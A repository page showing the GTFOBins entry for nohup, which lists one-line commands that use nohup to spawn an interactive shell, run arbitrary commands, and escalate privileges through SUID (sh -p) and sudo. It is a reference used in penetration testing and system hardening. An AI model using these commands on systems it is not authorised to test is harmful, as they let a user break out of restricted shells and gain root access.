This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
47698d0cfbc28d6fed2eb71d51f9f8673d7d1b50
GTFOBins.github.io
/
_gtfobins
/
nohup.md
Shikata
a48303c2b9
Remove redundant sudo from SUID category in nohup
2021-01-11 16:18:18 +02:00
334 B
Raw
Blame
History
functions
functions
shell
command
suid
sudo
code
nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
code
COMMAND='/usr/bin/id' nohup "$COMMAND" cat nohup.out
code
nohup /bin/sh -p -c "sh -p <$(tty) >$(tty) 2>$(tty)"
code
sudo nohup /bin/sh -c "sh <$(tty) >$(tty) 2>$(tty)"
Reference in New Issue
View Git Blame
Copy Permalink